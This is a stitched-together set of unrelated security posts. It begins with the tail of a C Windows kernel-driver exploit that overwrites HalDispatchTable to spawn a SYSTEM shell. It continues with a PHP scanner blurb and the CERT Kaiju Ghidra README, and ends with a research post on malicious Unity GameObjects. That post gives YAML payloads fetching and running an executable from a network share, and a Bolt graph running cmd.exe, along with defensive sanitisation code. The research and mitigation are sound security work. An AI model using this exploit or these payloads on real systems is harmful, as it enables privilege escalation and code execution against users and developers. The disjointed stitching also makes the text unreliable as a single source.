              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}

Php_Code_Analysis - Scan your PHP code for vulnerabilities


This script will scan your code.

The script can find:

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

Features:
  1. fast
  2. simple report

Usage:
python code.py <file name> >>> scan a single file
python code.py >>> scan the entire current folder (.)
python code.py <path> >>> scan the given folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file, example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update your AUTOCATS clone whenever you pull the latest Kaiju source code, to ensure the two stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the auto-remove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


Hacking Unity Games with Malicious GameObjects

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in a near-future augmented-reality, cyberpunk, Ready Player One-style world, an attacker may seek to inject things into a user’s reality to confuse, distract, or annoy them, which could cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used by Unity’s built-in UI components (such as Buttons) for event handlers (like onClick). Additionally, you can add handlers for events such as PointerClick, PointerEnter, Scroll, etc. to objects using an EventTrigger component.

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo, along with some experimenting, to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type of void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction: the event can call any method in a loaded assembly. You can skip to the exploitation section below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components). It specifies the type of event: PointerClick, PointerHover, etc. PointerClick is "4".
  • m_TargetAssemblyTypeName — This is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all of the Unity engine as well as a lot of .NET.
  • m_CallState — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_Mode — Determines the argument type of the called function:
    • 0 – EventDefined
    • 1 – Void
    • 2 – Object
    • 3 – Int
    • 4 – Float
    • 5 – String
    • 6 – Bool
  • m_Target — Specifies the Unity object instance that the method will be called on. Specifying m_Target: {fileID: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file and wait for the game client to trigger the event; OpenURL will then download and execute the payload.

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted it on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>
int main() {
  FILE* fp = fopen("/tmp/hello", "w");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!). Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After poring over the 426 discovered methods, I fell short of getting completely arbitrary code execution from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

  • Unity.CodeEditor.CodeEditor.SetExternalScriptEditor(): Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
  • PlayerPrefs.DeleteAll(): Delete all save games and other stored data.
  • UnityEditor.FileUtil.UnityDirectoryDelete(): Invokes Directory.Delete() on the specified directory.
  • UnityEngine.ScreenCapture.CaptureScreenshot(): Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
  • UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs(): Add flags to be passed to the Il2Cpp compiler.
  • UnityEditor.BuildPlayerWindow.BuildPlayerAndRun(): Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
  • Application.Quit(), EditorApplication.Exit(): Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of these systems are more powerful than others. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free.

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before including them in their game — first evaluating the asset creator’s trustworthiness before importing anything into their project, then reviewing the asset itself (more or less carefully depending on how much the creator is trusted).

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs on — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize the objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating it:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a whitelist of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.” Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended; the surface area is just too large and it’s likely something important will be missed, though a combination of whitelist and blacklist may be possible with high confidence.

